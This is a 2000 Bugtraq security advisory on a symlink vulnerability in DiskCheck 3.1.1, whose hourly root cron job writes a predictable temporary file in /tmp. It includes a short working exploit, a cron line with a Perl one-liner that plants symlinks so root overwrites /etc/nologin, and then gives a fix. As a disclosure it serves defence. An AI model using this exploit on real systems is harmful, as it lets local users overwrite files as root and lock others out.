Date: Sat, 5 Aug 2000 17:36:13 +0900 From: "You, Jin-Ho" <jhyou@CHONNAM.CHONNAM.AC.KR> Subject: Diskcheck 3.1.1 Symlink Vulnerability To: BUGTRAQ@SECURITYFOCUS.COM Diskcheck 3.1.1 Symlink Vulnerability 1 Introduction DiskCheck is a Perl script that monitors how much space is available on your hard drive. Basically, it checks your drive space every hour and takes action based on the specifications in the config file /etc/diskcheck.conf. DiskCheck 3.1.1 is available from http://www.kaybee.org/~kirk/html/linux.html and RedHat Powertools 6.x. 2 Vulnerability The command, /etc/cron.hourly/diskcheck.pl is executed with root privilege every hour. It creates a temporary file, whose default name is /tmp/diskusagealert.txt.<pid> defined in /etc/diskcheck.conf, is predictable and is willing to follow symbolic links. This may allow malicious local users to create or overwrite arbitrarily named files. 3 Exploit The following cron job creates the file, /etc/nologin. 0 * * * * perl -e 'foreach $i (1..200) { $pid = $$ + $i; \ symlink("/etc/nologin", "/tmp/diskusagealert.txt.$pid"); }' 4 Solution Relocate the temporary file into the directory where root only can create a file. Example) Edit /etc/diskcheck.conf $tempfile = '/var/local/diskusagealert.txt' # ls -ld /var/local drwxr-xr-x 2 root root 1024 Feb 7 1996 /var/local/ You, Jin-Ho, jhyou@chonnam.ac.kr